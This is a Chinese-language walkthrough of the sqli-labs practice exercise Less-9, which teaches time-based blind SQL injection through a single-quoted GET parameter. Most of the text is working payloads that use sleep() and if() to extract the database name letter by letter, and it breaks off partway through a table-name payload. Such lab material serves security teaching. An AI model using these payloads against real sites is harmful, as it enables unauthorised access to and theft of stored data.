Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
不管怎么输入,回显总是you are …
查看源码可知不管你怎么输入,输出结果都是You are in ,这就必须通过时间来判断了
于是考虑时间型盲注,payload
?id=1’ and sleep(3) --+
此时发现明显延迟,说明注入成功,接着我们进行爆破即可
爆库payload
?id=1’ and if(length(database())=4 , sleep(3), 1) --+
发现当?id=1’ and if(length(database())=8 , sleep(3), 1) --+时明显延迟,所以库名长为8
?id=1’ and if(left(database(),1)=‘s’ , sleep(3), 1) --+
发现明显延迟说明库名第一个字符为 ‘s’
继续爆破 ?id=1’ and if(left(database(),8)=‘security’ , sleep(3), 1) --+
说明库名为 ‘security’
爆表
?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)&